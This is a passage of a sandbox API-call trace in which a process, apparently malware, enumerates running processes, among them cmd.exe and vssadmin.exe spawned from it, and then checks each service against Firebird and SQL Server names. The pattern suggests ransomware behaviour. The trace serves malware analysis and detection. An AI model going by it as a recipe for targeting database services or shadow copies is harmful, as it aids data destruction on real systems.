lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0049.872] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0049.872] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0049.872] lstrlenW (lpString="gbp_chair.exe") returned 13 [0049.873] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0049.873] lstrlenW (lpString="attention infected.exe") returned 22 [0049.873] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0049.874] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0049.874] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0049.874] lstrlenW (lpString="pattern amateur.exe") returned 19 [0049.874] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0049.875] lstrlenW (lpString="referral.exe") returned 12 [0049.875] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0049.876] lstrlenW (lpString="copyingseems.exe") returned 16 [0049.876] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0049.877] lstrlenW (lpString="spin generally.exe") returned 18 [0049.877] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0049.877] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0049.877] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0049.878] lstrlenW (lpString="transmit.exe") returned 12 [0049.878] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0049.879] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0049.879] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0049.879] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0049.879] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0049.880] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0049.880] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0049.881] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0049.881] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0049.881] lstrlenW (lpString="delight.exe") returned 11 [0049.881] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0049.882] lstrlenW (lpString="within enquiry.exe") returned 18 [0049.882] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0049.883] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0049.883] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0049.883] lstrlenW (lpString="agent1c.exe") returned 11 [0049.884] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0049.884] lstrlenW (lpString="cmd.exe") returned 7 [0049.884] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.885] lstrlenW (lpString="conhost.exe") returned 11 [0049.885] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0049.886] lstrlenW (lpString="vssadmin.exe") returned 12 [0049.886] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0049.886] lstrlenW (lpString="VSSVC.exe") returned 9 [0049.886] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.887] lstrlenW (lpString="svchost.exe") returned 11 [0049.887] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0049.888] CloseHandle (hObject=0x198) returned 1 [0049.888] Sleep (dwMilliseconds=0x1f4) [0050.531] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37203d0 [0050.531] EnumServicesStatusExW (in: hSCManager=0x37203d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0050.532] GetLastError () returned 0xea [0050.532] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x3800fb0 [0050.532] EnumServicesStatusExW (in: hSCManager=0x37203d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0050.533] CloseServiceHandle (hSCObject=0x37203d0) returned 1 [0050.533] lstrlenW (lpString="Appinfo") returned 7 [0050.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0050.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0050.533] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0050.533] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0050.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0050.533] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0050.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.533] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0050.533] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0050.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0050.533] lstrlenW (lpString="AudioSrv") returned 8 [0050.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0050.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0050.533] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0050.533] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0050.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0050.533] lstrlenW (lpString="BFE") returned 3 [0050.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0050.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0050.533] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0050.533] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0050.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0050.533] lstrlenW (lpString="CryptSvc") returned 8 [0050.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0050.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0050.534] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0050.534] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0050.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0050.534] lstrlenW (lpString="CscService") returned 10 [0050.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0050.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0050.534] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0050.534] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0050.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0050.534] lstrlenW (lpString="DcomLaunch") returned 10 [0050.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.534] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0050.534] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0050.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0050.534] lstrlenW (lpString="Dhcp") returned 4 [0050.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0050.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0050.534] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0050.534] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0050.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0050.534] lstrlenW (lpString="Dnscache") returned 8 [0050.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0050.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0050.534] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0050.534] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0050.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0050.534] lstrlenW (lpString="DPS") returned 3 [0050.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0050.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0050.534] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0050.534] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0050.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0050.534] lstrlenW (lpString="eventlog") returned 8 [0050.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0050.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0050.535] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0050.535] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0050.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0050.535] lstrlenW (lpString="EventSystem") returned 11 [0050.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0050.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0050.535] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0050.535] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0050.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0050.535] lstrlenW (lpString="gpsvc") returned 5 [0050.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0050.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0050.535] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0050.535] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0050.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0050.535] lstrlenW (lpString="iphlpsvc") returned 8 [0050.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.535] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0050.535] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0050.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0050.535] lstrlenW (lpString="LanmanServer") returned 12 [0050.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0050.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0050.535] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0050.535] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0050.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0050.535] lstrlenW (lpString="LanmanWorkstation") returned 17 [0050.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.535] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0050.535] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0050.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0050.536] lstrlenW (lpString="lmhosts") returned 7 [0050.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0050.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0050.536] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0050.536] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0050.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0050.536] lstrlenW (lpString="MMCSS") returned 5 [0050.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0050.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0050.536] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0050.536] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0050.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0050.536] lstrlenW (lpString="MpsSvc") returned 6 [0050.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0050.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0050.536] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0050.536] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0050.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0050.536] lstrlenW (lpString="Netman") returned 6 [0050.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0050.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0050.536] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0050.536] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0050.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0050.536] lstrlenW (lpString="netprofm") returned 8 [0050.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0050.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0050.536] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0050.536] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0050.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0050.536] lstrlenW (lpString="NlaSvc") returned 6 [0050.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0050.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0050.537] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0050.537] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0050.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0050.537] lstrlenW (lpString="nsi") returned 3 [0050.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0050.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0050.537] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0050.537] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0050.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0050.537] lstrlenW (lpString="PcaSvc") returned 6 [0050.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0050.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0050.537] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0050.537] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0050.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0050.537] lstrlenW (lpString="PlugPlay") returned 8 [0050.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0050.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0050.537] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0050.537] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0050.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0050.537] lstrlenW (lpString="Power") returned 5 [0050.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0050.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0050.537] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0050.537] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0050.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0050.537] lstrlenW (lpString="ProfSvc") returned 7 [0050.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0050.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0050.537] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0050.537] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0050.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0050.537] lstrlenW (lpString="RpcEptMapper") returned 12 [0050.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.538] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0050.538] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0050.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0050.538] lstrlenW (lpString="RpcSs") returned 5 [0050.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0050.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0050.538] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0050.538] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0050.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0050.538] lstrlenW (lpString="SamSs") returned 5 [0050.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0050.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0050.538] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0050.538] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0050.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0050.538] lstrlenW (lpString="Schedule") returned 8 [0050.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0050.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0050.538] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0050.538] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0050.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0050.538] lstrlenW (lpString="SENS") returned 4 [0050.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0050.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0050.538] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0050.538] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0050.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0050.538] lstrlenW (lpString="ShellHWDetection") returned 16 [0050.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.538] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0050.538] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0050.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0050.539] lstrlenW (lpString="Spooler") returned 7 [0050.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0050.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0050.539] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0050.539] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0050.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0050.539] lstrlenW (lpString="swprv") returned 5 [0050.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0050.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0050.539] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0050.539] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0050.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0050.539] lstrlenW (lpString="SysMain") returned 7 